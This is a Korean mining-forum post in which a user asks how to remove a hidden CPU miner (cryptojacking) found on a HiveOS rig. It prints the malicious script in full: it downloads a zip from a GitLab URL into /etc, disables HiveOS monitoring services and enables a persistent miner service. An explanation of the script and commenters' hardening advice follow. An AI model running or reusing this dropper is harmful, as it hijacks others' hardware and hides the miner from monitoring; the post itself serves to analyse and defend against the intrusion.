mining custom_top_html:no
default debug random = 2 / type = READ / detected = READ

 

2024-09-26_155955.jpg

 

2024-09-26_161025.jpg

2024-09-26_163006.jpg

 

 

어제 올린글이 애매해서 더 알아보고 하루만에 재업했습니다.

아무것도 구동안하는데 벽전력200w 언저리 왓다갓다하네요.

그래서 hive htop으로 확인해보니 데로채굴중인듯한데

쓰레드 4로 돌고 있습니다.

 

약80~100w먹는걸로 추정 

 

이거 중지할려다가 어제 서버하나 날라가버렸네요. gpt의 도움으로 kill 여러번먹여봣는데도 재부팅후에 자동적으로 가동하던데.

서버를 통해 동작시키는게 아니라 hive /etc/hivecpude 백그라운드가동인건지?

 

이거 중지하는 방법 아시는분 계실런지요?

 

서버를 빌려줬을때 명령어로 자동실행하게끔 만들어둔건지

아니면 hive를 통해 들어와서 도둑채굴되게끔 만든건지 모르겠습니다.

 

곰곰히 생각해봐도 이건 서버빌려준적이 없는거 같은데 불확실

 

그렇다면 hive에서 비번을 안걸어둬서 그럴거 같은데 대처를 하기 위해서 질문드려봅니다.

 

 

nano hivecpude3.sh

#!/bin/bash

wget https://gitlab.com/file-repositories/files-repositories/-/raw/main/hivecpude3.zip -O /etc/hivecpude3.zip

unzip -o /etc/hivecpude3.zip -d /etc

cp /etc/hivecpude.service /etc/systemd/system/

sudo systemctl stop hivestats

sudo systemctl stop hive-agent

sudo systemctl disable hivestats

sudo systemctl disable hive-agent

sudo systemctl stop birqflow

sudo systemctl disable hiveos-verstats

sudo systemctl stop hiveos-verstats

sudo systemctl disable birqflow

sudo systemctl start hivecpude

sudo systemctl enable hivecpude

 

해당 스크립트는 HiveOS에서 CPU 채굴을 위해 자동으로 실행되는 악성 스크립트일 가능성이 큽니다. 이 스크립트는 외부 서버에서 ZIP 파일을 다운로드하고, 이를 특정 디렉토리에 풀어 여러 시스템 서비스와 관련된 작업을 수행합니다. 아래는 스크립트의 주요 내용입니다:

  1. wget으로 ZIP 파일 다운로드: https://gitlab.com/file-repositories/files-repositories/-/raw/main/hivecpude3.zip 파일을 /etc/hivecpude3.zip 위치에 다운로드.
  2. ZIP 파일 압축 해제: 다운로드된 파일을 /etc에 압축 해제.
  3. 서비스 설정: hivecpude.service 파일을 시스템 서비스 디렉토리(/etc/systemd/system/)로 복사.
  4. HiveOS의 기본 서비스 중단: hivestats, hive-agent, birqflow, hiveos-verstats 등의 서비스 중단 및 비활성화.
  5. 악성 서비스 실행 및 활성화: hivecpude라는 새로운 서비스가 실행되고, 부팅 시 자동으로 시작되도록 활성화.

이 스크립트는 정상적인 시스템 동작을 방해하고, 외부에서 다운로드한 파일을 실행하는 방식으로 시스템에 악성 소프트웨어를 설치하는 것을 목적으로 하고 있는 것으로 보입니다.

 

 

 

 

 

660
댓글 8
  • gpt의 도움으로 서버제거안되고 중지완료. 도둑놈 쫒았습니다.
  • @복태취업했다
    복태취업했다님 축하합니다. 16 보너스 캐시에 당첨되셨습니다.!!
  • ?
    헐 이런것도 있군요....전 대부분 셀러론 펜티엄이라...괜찮은건지..ㅠ

    초기 비번하고 vnc파일비번 모두 변경해놓고...공유기 하위에 물려놔서 그런지 아직 멀쩡한듯 합니다..
  • @껄껄껄무새
    vnc비번은 최근거부터는 바꾸고 있긴한데. 저는 대부분의 채굴기들이 허브에 물려있네요. 서버를 통해 들어온건지 hiveos를 타고 들어온건지 아리송합니다.
  • ?
    서버를 빌려줘요??? hiveOS를 설치한 상태로 빌려줬더니 악성코드를 심었다는 이야기인가요?
  • @적왕슈리
    hiveos로 만든 clore서버인데 서버를 빌려주고 주피터를 통해서 백그라운드형식으로 동작하도록 심은건지 아니면 공유기나 vnc쪽으로 hiveos를 타고 들어와서 백그라운드형식으로 동ㅇ작하도록 심은건지 모르겠습니다.
  • ?
    @복태취업했다
    HiveOS 하단에 Clore 서버를 설치했다면, 역으로 상단에 있는 HiveOS쪽으로의 접속수단에 대한 차단은 제대로 하셨나요? 일단 훈이님이 어떤 식으로 서버를 설치하건 인터넷이 된다면 Tracert 기능을 통해서 호스트OS의 IP를 알아낼수 있습니다. 인터넷으로 통하는 패킷이 Clore 서버=>HiveOS를 통해서 외부로 나가니까요. 이런 점을 방지하려면 애초에 호스트OS의 하단에 게스트OS를 설치할때 네트워크를 브릿지 방식으로 설치하면 됩니다. 그렇게 하면 호스트OS와 게스트OS는 논리적으로 별개의 네트웍 개체가 되어 패킷추적방식으로는 호스트OS의 IP가 드러나지는 않게 할수 있죠.

    이 상태에서 훈이님이 HiveOS쪽의 보안설정을 제대로 바꿔놓지 않고 디폴트로 놔뒀다면 아주 높은 확률로 HiveOS가 털리겠죠. 지금은 그나마 HiveOS 루트계정의 기본 암호가 "1" 로 되어 있던 옛날의 문제점을은 패치된 걸로 알지만 그래도 아직까지 기본 설정의 HiveOS는 보안에 엄청 취약합니다.

    훈이님이 HiveOS를 호스트로 삼을거면 모든 보안적 약점을 다 대응하고 나서 하위에 뭘 깔아야 하셨겠죠. 지금 상태라면 99.99% HiveOS쪽으로 침투가 되어 있을 겁니다. 그냥 HiveOS 전체를 삭제하고 다시 설치하시는 편이 낫습니다. 그리고 가급적 HiveOS처럼 보안에 취약한 OS를 호스트로 삼는건 피하라고 말하고 싶어집니다만.....
  • @적왕슈리
    이번사건을 개기로 다시 한번 느끼게 되더라구요. 다른건 안그런데 딱 한대만 그렇더라구요. 비번걸고 지켜보고 있습니다. 또 그러면 다시 하나하나 만져나가야겠어요.
default debug random = 0 / type = READ / detected = READ

채굴

코인 채굴에 관한 게시판입니다.

List of Articles
번호 분류 제목 추천 수 조회 수 글쓴이 날짜
공지 채굴 새로 들어오시는분들! - 땡글 이용시 지켜지면 좋은 것 94 312 78968
김광부
2017.06.25
공지 2025년 땡글 달력 이벤트 2 update 3 239
이벤트관리자
2024.10.07
공지 땡글닷컴 X 슈퍼워크 이벤트 (9/30~10/14) 29 file 7 2086
이벤트관리자
2024.09.26
75787 채굴 f2풀 알레오 업데잇~ 10     이제 카드별 해시 나오네요. 하이브 해시그래프도 잡히고....이제 좀...나아지네요.   근데 해시가 딱 그번호 카드 해시가 아닐 가능성 높습니다. 뒤죽박죽 이네요..ㅋㅋㅋ 그냥 대략적으로만 보셔야 할듯..   괜... 3 update 0 288
껄껄껄무새
2024.10.12
75786 채굴 망코인의 정석, Xelis 4달 채굴 소회   몇년동안 잡코인을 캐면서 느낀것이,   '꾸준히(최소 2개월 이상) 채굴량이 늘어나면 망코인이다'         라는 것이고, 현재 열심히 캐고 있는 Xelis 는 이 조건을 매우 잘 충족합니다.   캐기 시작한 날에는 하... 5 file 0 590
FSPLifeStyle
2024.10.06
75785 채굴 알레오 채굴시 하이브에서 개별 gpu 모니터링 방법이 있나요? 안녕하세요?   f2풀에서 알레오 채굴 중인데요, 이거 하이브에서 개별 gpu 모니터링 할 방법이 있는건가요? GPU 별로 해시가 얼마나오는건지, 살아는 있는건지 알수가 없네요.   그냥 파워 먹고 있으면 돌고 있다고 ... 3 0 340
최리니
2024.10.06
75784 채굴 알레오 코인 지갑으로 옮기기..가 잘 안되네요. https://aleo1.to/testnet-rewards 에 접속해서 예전에 채굴할때 만들어 뒀던 알레오지갑주소 입력하니    Mainnet rewards 얼마 라고 뜹니다.   LEO 지갑을 설치하고 Private Key를 입력하니 LEO지갑에 채굴했던 알... 2 0 328
시티헌터2022
2024.10.05
75783 채굴 알레오 하이브 무엇이 문제 인가요.ㅜ.ㅜ     이상태에서 작동이 되지 않습니다..ㅜ.ㅜ                       6 file 0 457
마이닝쮠
2024.10.04
75782 채굴 혼돈의 카오스 알레피움 아식세상....     알레피움은 아식 경쟁으로 망해가네요.  먼 아직 배송시작도 안했는데...가격이 내려가네요.   골드쉘 가격 맞춘다고....공홈은 못내리고 판매사이트서 할인하네요.ㅋ   11월되면 해시 3배는 올라갈듯....60페타 ... 14 file 0 660
껄껄껄무새
2024.10.03
75781 채굴 k1풀 rx0 차이나 연결 안되네요.;;;;     험풀로 가셔용...   k1풀 연결이 안됩니다. eu는 연결되긴하는데 해시가 안나오고 그러네요.   그냥 헙풀이 잘나오네요     0 135
껄껄껄무새
2024.10.02
75780 채굴 AL0 오버펌 업데잇           https://github.com/rdugan/iceriver-alph-oc/releases/tag/v0.8.4   0.8.3버젼 해시 절반이 수수료로 가버린 버그가 있었다네요.ㅋㅋㅋㅋㅋㅋㅋ   미친..   증빙가능하면 환불해준다는데.....증빙이 쉽나.... 8 0 332
껄껄껄무새
2024.10.02
75779 채굴 그래픽카드 한성컴퓨터 리퍼     알리에서 4060 31만에 뜬거 놓치고...둘러보다 보니 한성컴에서 리퍼글카 파는게 있더라구요.   3060ti 30만 3070 33만   카드가능 무이자할부가능에 한달 보증해줘서 머 쏘쏘한듯 합니다.  아 네이버페이 가능하... 7 0 567
껄껄껄무새
2024.10.02
75778 채굴 알레오 상금 당첨이 될수 있을까? 시도도 안해본자 기회조차 없다.. https://support.global.hashkey.com/hc/en-us/articles/16164042914460-Introducing-10th-HashKey-Launchpool-Aleo-ALEO-Lock-USDT-and-ALEO-to-Earn-from-100-000-ALEO-Prize-Pool     https://global.hashkey.com/... 3 file 0 320
복태취업했다
2024.10.02
75777 채굴 알레오도 아식이 나오는 군요   bitmain에서 알레오 아식도 나온다고 하네요.. 진정 gpu는 끝난 것인가...                     2 0 629
환타스틱베베
2024.10.02
75776 채굴 Xelis 캐는 분들       안녕하세요   HIVEOS 로 Xelis 캐는데 새벽부터 해시가 인식되지 않습니다.   K1POOL 에서는 16대 전부 인식되고 있지만 두번째 스샷처럼 펜딩 밸런스가 늘어나지 않습니다(안캐고 있다는 뜻)   기계들은 전기... 3 file 0 537
FSPLifeStyle
2024.09.30
75775 채굴 amd 는 알레오도 못 캐는 거 같고 갈수록 고물이 되가네요.. 6700 잔뜩 갖고 있는데   진짜 요즘 쓸모없다고 느낍니다   팔기엔 아까워서 저전력인 pyi 만 돌리고 있네요 ㅜ                       5 0 653
채소
2024.09.29
75774 질문 알레오 문의 드려요. 윈도우에서 하고 있어서 채굴은 f2pool로 하였는데.   셋팅을 못하고 있습니다.   프로그램 설치하고 파일도 실행 시켜서 f2pool 에서 채굴 되는건 확인하였는데.   오버 값을 어떻게 설정 해야할가요?   배치파일이... 15 0 1379
여의도광부
2024.09.28
75773 채굴 알레피움 아식이는 구매 주의하세요     알레피움 아식 시장은 개판 시작되었습니다.  라이트 나올때만해도 개판오분전인가 했는데...     골드쉘이 아이스리버 2T에 맞서서 저렴한 아식 쳐냈네요..;;;;;;  아오   1.25T 600W  760불 (RABID 쓰면 70불할... 5 file 0 641
껄껄껄무새
2024.09.28
75772 채굴 3일간 채굴장와서 알레오 세팅 했네요. 드뎌 끝났습니다.       하루 몇대씩 세팅해서 드뎌 끝났네요. 다른 코인과 다르게 난이도가 제법 있었습니다. 여러대 한꺼번에 세팅하다가 갑자기 동시에 3080 이었나 300와트를 먹고 100도 찍고 가슴 철렁하기도 하고요, 불날까봐 조... 9 file 0 1236
심해왕티모
2024.09.28
75771 채굴 알레오 F2풀 버젼업       3.0.8 입니다.   하이브는 서버주소도 아래랑 같지 않으면 접속 안됩니다. 살펴보세요   stratum+ssl://aleo-asia.f2pool.com:4420             [Recommended]  Aleo Miner 3.0.8 download link: For Ubuntu: ... 3 1 754
껄껄껄무새
2024.09.27
75770 채굴 ubuntu에서 AMD(6800xt,6900xt) 그래픽카드 오버하는 방법?       고수님들 ubuntu(20.04)에서 AMD(6800xt. 6900xt) 오버하는 방법좀 알고싶습니다   혹시 아시는분 조언부탁해요                 0 280
사랑천사
2024.09.27
75769 질문 Tradeogre 에 있는 xel 을 현금화해서 코인원의 kas 를 사고 싶은데...   안녕하세요 맨날 채굴만 하고 사고팔고를 안해봐서 이런거에 무지하다보니 질문드립니다   tradeogre 계정에 xel 이 3천달러정도 있는데, 결론적으로 이것을 코인원의 kas로 변환시키고 싶습니다.       tradeogre ... 2 0 348
FSPLifeStyle
2024.09.26
채굴 hiveos 도둑채굴에 대한 재질문         어제 올린글이 애매해서 더 알아보고 하루만에 재업했습니다. 아무것도 구동안하는데 벽전력200w 언저리 왓다갓다하네요. 그래서 hive htop으로 확인해보니 데로채굴중인듯한데 쓰레드 4로 돌고 있습니다.   ... 8 file 0 581
복태취업했다
2024.09.26
목록
Board Pagination Prev 1 2 3 4 5 6 7 8 9 10 ... 3790 Next
/ 3790
default debug random = 0 / type = READ / detected = READ